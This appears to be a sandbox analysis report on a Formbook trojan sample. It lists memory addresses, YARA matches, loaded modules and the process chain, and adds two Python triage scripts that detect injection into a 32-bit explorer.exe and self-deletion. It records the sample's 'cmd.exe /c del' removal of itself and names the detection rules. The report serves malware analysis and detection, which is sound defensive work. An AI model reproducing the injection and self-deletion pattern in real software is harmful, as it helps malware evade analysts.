          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CACE935_2_04CACE93
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF0E595_2_04BF0E59
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAEE265_2_04CAEE26
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C6EFA05_2_04C6EFA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE2FC85_2_04BE2FC8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C64F405_2_04C64F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C32F285_2_04C32F28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C10F305_2_04C10F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C92F305_2_04C92F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BD68B85_2_04BD68B8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C1E8F05_2_04C1E8F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFA8405_2_04BFA840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF28405_2_04BF2840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF29A05_2_04BF29A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CBA9A65_2_04CBA9A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C069625_2_04C06962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BEEA805_2_04BEEA80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA6BD75_2_04CA6BD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAAB405_2_04CAAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE14605_2_04BE1460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF43F5_2_04CAF43F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8D5B05_2_04C8D5B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA75715_2_04CA7571
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA16CC5_2_04CA16CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF7B05_2_04CAF7B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C9F0CC5_2_04C9F0CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA70E95_2_04CA70E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF0E05_2_04CAF0E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF70C05_2_04BF70C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFB1B05_2_04BFB1B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CBB16B5_2_04CBB16B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C2516C5_2_04C2516C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BDF1725_2_04BDF172
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0B2C05_2_04C0B2C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF52A05_2_04BF52A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C912ED5_2_04C912ED
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0D2F05_2_04C0D2F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C3739A5_2_04C3739A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA132D5_2_04CA132D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BDD34C5_2_04BDD34C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFCF25_2_04CAFCF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C69C325_2_04C69C32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0FDC05_2_04C0FDC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA1D5A5_2_04CA1D5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA7D735_2_04CA7D73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF3D405_2_04BF3D40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF9EB05_2_04BF9EB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF1F925_2_04BF1F92
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB3FD25_2_04BB3FD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB3FD55_2_04BB3FD5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFFB15_2_04CAFFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFF095_2_04CAFF09
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF38E05_2_04BF38E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C5D8005_2_04C5D800
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0B9505_2_04C0B950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C859105_2_04C85910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF99505_2_04BF9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C9DAC65_2_04C9DAC6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C35AA05_2_04C35AA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8DAAC5_2_04C8DAAC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C91AA35_2_04C91AA3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFA495_2_04CAFA49
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA7A465_2_04CA7A46
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C63A6C5_2_04C63A6C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C65BF05_2_04C65BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C2DBF95_2_04C2DBF9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0FB805_2_04C0FB80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFB765_2_04CAFB76
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E7A95_2_0296E7A9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E5415_2_0296E541
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D5665_2_0296D566
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D9045_2_0296D904
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02959E505_2_02959E50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02959E4B5_2_02959E4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02952FB05_2_02952FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02952D905_2_02952D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAA0365_2_04AAA036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAE5CD5_2_04AAE5CD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA2D025_2_04AA2D02
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA10825_2_04AA1082
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA89125_2_04AA8912
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAB2325_2_04AAB232
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA5B325_2_04AA5B32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA5B305_2_04AA5B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C5EA12 appears 86 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C37E54 appears 99 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C25130 appears 58 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04BDB970 appears 262 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C6F290 appears 103 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 0114F290 appears 103 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 010BB970 appears 262 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 01105130 appears 58 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 01117E54 appears 99 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 0113EA12 appears 86 times
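The Code function and String function rows above list the same helpers twice, once inside the sample (process 3) and once inside the 32-bit explorer.exe (process 5), with a constant offset between the two address sets. The script below is an added example and is not part of the Joe Sandbox report: it parses a handful of those rows (copied verbatim from this report, with the extraction-fused column separator left as-is) and recovers that relocation delta, which is the quickest way to confirm from the report alone that the code running in explorer.exe is the sample's own unpacked payload mapped at a different base. Reading the `N_M_ADDR` identifiers as process index, run index and virtual address is an assumption made for the example.

```python
import re
from collections import Counter, defaultdict

# Rows copied from the report above. Extraction fused the table columns, so each
# function id appears twice on a row; the regexes below tolerate that.
REPORT_ROWS = r"""
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D38E03_2_010D38E0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FB763_2_0118FB76
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EFB803_2_010EFB80
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01145BF03_2_01145BF0
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110DBF93_2_0110DBF9
Source: C:\Windows\explorer.exeCode function: 4_2_0E73A2324_2_0E73A232
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF38E05_2_04BF38E0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFB765_2_04CAFB76
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0FB805_2_04C0FB80
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C65BF05_2_04C65BF0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C2DBF95_2_04C2DBF9
Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C5EA12 appears 86 times
Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04BDB970 appears 262 times
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 0113EA12 appears 86 times
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 010BB970 appears 262 times
"""

SRC_SAMPLE = r"C:\Users\user\Desktop\TU0kiz3mxz.exe"
SRC_WOW64 = r"C:\Windows\SysWOW64\explorer.exe"

# "3_2_010D38E0" is assumed to mean <process index>_<run index>_<virtual address>.
CODE_FN = re.compile(r"Code function: (\d+)_(\d+)_([0-9A-F]{8})")
STR_FN = re.compile(r"Source: (.+?)Code function: String function: ([0-9A-F]{8}) appears (\d+) times")


def parse_rows(text):
    """Return two maps: {(process, run): {addr}} and {(source, hit_count): {addr}}."""
    code, strings = defaultdict(set), defaultdict(set)
    for line in text.splitlines():
        m = STR_FN.search(line)
        if m:
            strings[(m.group(1), int(m.group(3)))].add(int(m.group(2), 16))
            continue
        m = CODE_FN.search(line)  # first hit only; the duplicated id is ignored
        if m:
            code[(int(m.group(1)), int(m.group(2)))].add(int(m.group(3), 16))
    return code, strings


def relocation_delta(addrs_a, addrs_b):
    """Most common (b - a) over all address pairs, and how many pairs it explains.

    If one delta explains every address in A, B holds the same code as A loaded at
    a different base: exactly what a payload injected into another process looks like.
    """
    diffs = Counter(b - a for a in addrs_a for b in addrs_b)
    delta, hits = diffs.most_common(1)[0]
    return delta, hits


def string_function_deltas(strings, src_a, src_b):
    """Pair string helpers across two sources by their identical call-site count and
    return the set of address deltas; a single value means they all moved together."""
    deltas = set()
    for (src, hits), addrs in strings.items():
        other = strings.get((src_b, hits))
        if src == src_a and other and len(addrs) == len(other) == 1:
            deltas.add(next(iter(other)) - next(iter(addrs)))
    return deltas


if __name__ == "__main__":
    code, strings = parse_rows(REPORT_ROWS)
    delta, hits = relocation_delta(code[(3, 2)], code[(5, 2)])
    print(f"process 3 -> process 5: delta 0x{delta:08X} explains {hits}/{len(code[(3, 2)])} functions")
    print("string helper deltas:", sorted(hex(d) for d in string_function_deltas(strings, SRC_SAMPLE, SRC_WOW64)))
```

Run against the full row set the same way; the delta stays 0x03B20000 for every function of process 3, while the 64-bit explorer.exe functions (process 4) share no common offset with either, which is the expected picture when only the SysWOW64 instance hosts the payload.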
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
Source: TU0kiz3mxz.exe, 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000000.00000002.1698984998.00000000007AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000000.00000000.1681136738.000000000033E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePpqg.exe8 vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000000.00000002.1710158521.0000000007000000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: \[FileVersionLegalCopyrightOriginalFilenameInternalNameCompanyNameProductNameProductVersionFileDescription vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000003191000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.00000000011BD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TU0kiz3mxz.exe
Source: TU0kiz3mxz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: TU0kiz3mxz.exe PID: 1148, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: explorer.exe PID: 3584, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Rule metadata as reported:
Windows_Trojan_Formbook_1112e116: reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: TU0kiz3mxz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@24/1@12/1
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TU0kiz3mxz.exe.log
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f54c312f-1ac3-4336-8602-9e5aed610beb
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: TU0kiz3mxz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TU0kiz3mxz.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TU0kiz3mxz.exe | Virustotal: Detection: 76%
Source: TU0kiz3mxz.exe | ReversingLabs: Detection: 91%
Source: explorer.exe | String found in binary or memory: /LOADSAVEDWINDOWS
Source: explorer.exe | String found in binary or memory: accent-startColorMenu
Source: explorer.exe | String found in binary or memory: accent-startColor
Source: explorer.exe | String found in binary or memory: themes-installTheme
Source: explorer.exe | String found in binary or memory: Microsoft-Windows-Shell-Launcher
Source: explorer.exe | String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
Source: unknown | Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
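The process-creation rows above describe the whole chain: the .NET dropper re-launches its own image, the 64-bit shell starts a 32-bit explorer.exe that hosts the payload, that explorer.exe removes the dropper with cmd.exe, and the shell later starts WerFault for PID 2580. The script below is an added example, not part of the Joe Sandbox report: it rebuilds the process tree from those rows (copied verbatim, fused column separator included) and emits the flags a triage analyst would want from them. Treating `unknown` as the tree root and matching parents and children by path suffix are assumptions made for the example.

```python
import re
from collections import defaultdict

# "Process created" rows copied from the report above (parent image on the left of
# the fused column separator, child image and command line on the right).
PROCESS_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
"""

SAMPLE_PATH = r"C:\Users\user\Desktop\TU0kiz3mxz.exe"

# parent image, child image (no spaces in these paths), remaining command line
ROW = re.compile(r"Source: (.+?)Process created: (\S+)\s*(.*)")


def parse_edges(text):
    """Return (parent_image, child_image, child_cmdline) triples in report order."""
    edges = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            edges.append((m.group(1), m.group(2), m.group(3)))
    return edges


def render_tree(edges, root="unknown"):
    """Indented process tree, one line per spawn; self-spawns are listed but not descended into."""
    children = defaultdict(list)
    for parent, child, cmd in edges:
        children[parent].append((child, cmd))
    lines = []

    def walk(node, depth):
        for child, cmd in children.get(node, []):
            lines.append("  " * depth + f"{child} {cmd}".rstrip())
            if child != node:  # guard against the dropper's own image recursing forever
                walk(child, depth + 1)

    walk(root, 0)
    return lines


def behaviour_flags(edges, sample_path=SAMPLE_PATH):
    """Tree-level observations an analyst would pull out of these rows."""
    flags = []
    for parent, child, cmd in edges:
        p, c = parent.lower(), child.lower()
        if p == c:
            flags.append(f"self-spawn: {child} launched its own image again")
        if p.endswith(r"\windows\explorer.exe") and c.endswith(r"\syswow64\explorer.exe"):
            flags.append("64-bit explorer.exe spawned a 32-bit explorer.exe (host for a 32-bit injected payload)")
        if c.endswith(r"\cmd.exe") and re.search(r"/c\s+del\s", cmd, re.I) and sample_path.lower() in cmd.lower():
            flags.append(f"self-deletion: {parent} ran cmd.exe to delete the original sample")
        if c.endswith(r"\werfault.exe"):
            pid = re.search(r"-p\s+(\d+)", cmd)
            flags.append(f"crash: {parent} started WerFault for PID {pid.group(1) if pid else '?'}")
    return flags


if __name__ == "__main__":
    edges = parse_edges(PROCESS_ROWS)
    print("\n".join(render_tree(edges)))
    print("\n".join(behaviour_flags(edges)))
```

The same three conditions (a 64-bit shell spawning its SysWOW64 twin, cmd.exe deleting the file that started the chain, and a binary re-launching its own image) map directly onto Sysmon event ID 1 fields, so the flag logic transfers to an EDR rule with only the field names changed.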
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
